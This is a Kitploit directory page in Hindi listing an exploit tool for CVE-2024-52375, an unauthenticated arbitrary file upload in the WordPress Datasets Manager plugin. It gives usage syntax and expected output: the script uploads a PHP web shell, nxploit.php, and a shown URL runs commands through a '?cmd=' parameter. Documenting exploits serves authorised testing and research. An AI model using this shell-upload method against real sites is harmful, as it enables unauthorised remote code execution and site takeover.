Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-52375 — WordPress Datasets Manager by Arttia Creative plugin <= 1.5 - मनमाना फ़ाइल अपलोड भेद्यता | Kitploit
उपकरण/GitHubGitHub/nxploited/cve-2024-52375
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubnxploited/cve-2024-52375

CVE-2024-52375

WordPress Datasets Manager by Arttia Creative plugin <= 1.5 - मनमाना फ़ाइल अपलोड भेद्यता

रिपॉजिटरी देखें
1 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

WordPress Datasets Manager <= 1.5 - मनमाना फ़ाइल अपलोड (CVE-2024-52375)

💥 एक्सप्लॉइट द्वारा: Nxploit (Khaled Alenazi)
📅 CVE प्रकाशित: 14 नवंबर, 2024
🧠 CVSS स्कोर: 10.0 (गंभीर)
🛠 CWE-434: खतरनाक प्रकार वाली फ़ाइल का अप्रतिबंधित अपलोड


📌 विवरण

Arttia Creative के WordPress प्लगइन Datasets Manager में एक गंभीर कमजोरी पाई गई, जो 1.5 तक सभी संस्करणों को प्रभावित करती है।

प्लगइन अपलोड प्रक्रिया के दौरान फ़ाइल प्रकारों का सही ढंग से सत्यापन करने में विफल रहता है, जिससे एक अप्रमाणित हमलावर मनमानी फ़ाइलें — PHP शेल सहित — अपलोड कर सकता है और दूरस्थ कोड निष्पादन (RCE) प्राप्त कर सकता है।


🧠 CVE विवरण

  • CVE ID: CVE-2024-52375
  • प्रभावित प्लगइन: Arttia Creative द्वारा Datasets Manager
  • प्रभावित संस्करण: <= 1.5
  • कमजोरी का प्रकार: मनमाना फ़ाइल अपलोड (अप्रमाणित)
  • CWE: CWE-434 - खतरनाक प्रकार वाली फ़ाइल का अप्रतिबंधित अपलोड
  • CVSS v3.1: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
  • गंभीरता: 🔴 गंभीर (10.0)

⚙️ आवश्यकताएँ

  • Python 3.x
  • requests लाइब्रेरी:
    root@kitploit:~
    pip install requests
    

🚀 उपयोग

root@kitploit:~

usage: CVE-2024-52375.py [-h] -u URL

Exploit for WordPress Datasets Manager <= 1.5 - Arbitrary File Upload | By: Nxploit | Khaled Alenazi

options:
  -h, --help     show this help message and exit
  -u, --url URL  Full target URL (e.g. http://target.com/wordpress)

URL को लक्ष्य WordPress स्थापना के पूर्ण पथ से बदलें।


✅ अपेक्षित आउटपुट

यदि सफल हो, तो स्क्रिप्ट:

  1. फ्रंटएंड से सार्वजनिक _wpnonce निकालें।
  2. nxploit.php नामक एक PHP शेल अपलोड करें।
  3. जांचें कि शेल सुलभ है या नहीं और इसका URL प्रदर्शित करें:
root@kitploit:~
[+] Shell available at:
    http://target.com/wordpress/wp-content/uploads/2025/03/nxploit.php

फिर आप इस तरह कमांड निष्पादित कर सकते हैं:

root@kitploit:~
http://target.com/wordpress/wp-content/uploads/2025/03/nxploit.php?cmd=id

🔒 नोट्स

  • एक्सप्लॉइट प्लगइन संस्करण को स्वचालित रूप से readme.txt के माध्यम से जांचता है।
  • केवल <= 1.5 संस्करण ही कमजोर हैं।
  • कोई प्रमाणीकरण आवश्यक नहीं है।


📢 अस्वीकरण

यह टूल केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए प्रदान किया गया है।
इसे उन सिस्टमों के विरुद्ध उपयोग करना जिनके आप मालिक नहीं हैं या जिनके परीक्षण की अनुमति नहीं है, अवैध है।

टूल डाउनलोड करें